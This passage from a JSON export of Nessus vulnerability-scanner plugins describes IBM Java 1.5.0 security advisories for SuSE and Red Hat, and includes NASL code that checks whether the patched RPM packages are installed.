A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/", "edition": 24, "published": "2010-01-08T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6740)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2010-01-08T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-6740.NASL", "href": "https://www.tenable.com/plugins/nessus/43822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43822);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6740)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. 
(CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. 
This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6740.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.1\")) flag++;\nif 
(rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-demo-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-src-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", 
reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:17", "description": "Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. 
All running\ninstances of IBM Java must be restarted for this update to take\neffect.", "edition": 29, "published": "2009-12-09T00:00:00", "title": "RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:1647)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2010-0079", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-09T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-javacomm", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-accessibility", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-src", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-plugin"], "id": "REDHAT-RHSA-2009-1647.NASL", "href": "https://www.tenable.com/plugins/nessus/43079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1647. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43079);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\", \"CVE-2010-0079\");\n script_bugtraq_id(36881);\n script_xref(name:\"RHSA\", value:\"2009:1647\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:1647)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. 
All running\ninstances of IBM Java must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3877\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1647\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1647\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-demo-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-devel-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-src-1.5.0.11-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if 
(rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-demo-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-devel-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-src-1.5.0.11-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.5.0-ibm / java-1.5.0-ibm-accessibility / java-1.5.0-ibm-demo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:26", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues. 
It also contains a timezone update for the\ncurrent Fiji change (timezone 1.6.9s).\n\nThe update fixes the following security issues : \n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876, CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. 
(CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. 
This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also refer to http://www.ibm.com/developerworks/java/jdk/alerts\nfor more information about this update.", "edition": 24, "published": "2009-12-27T00:00:00", "title": "SuSE9 Security Update : IBM Java 1.5.0 (YOU Patch Number 12564)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12564.NASL", "href": "https://www.tenable.com/plugins/nessus/43599", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 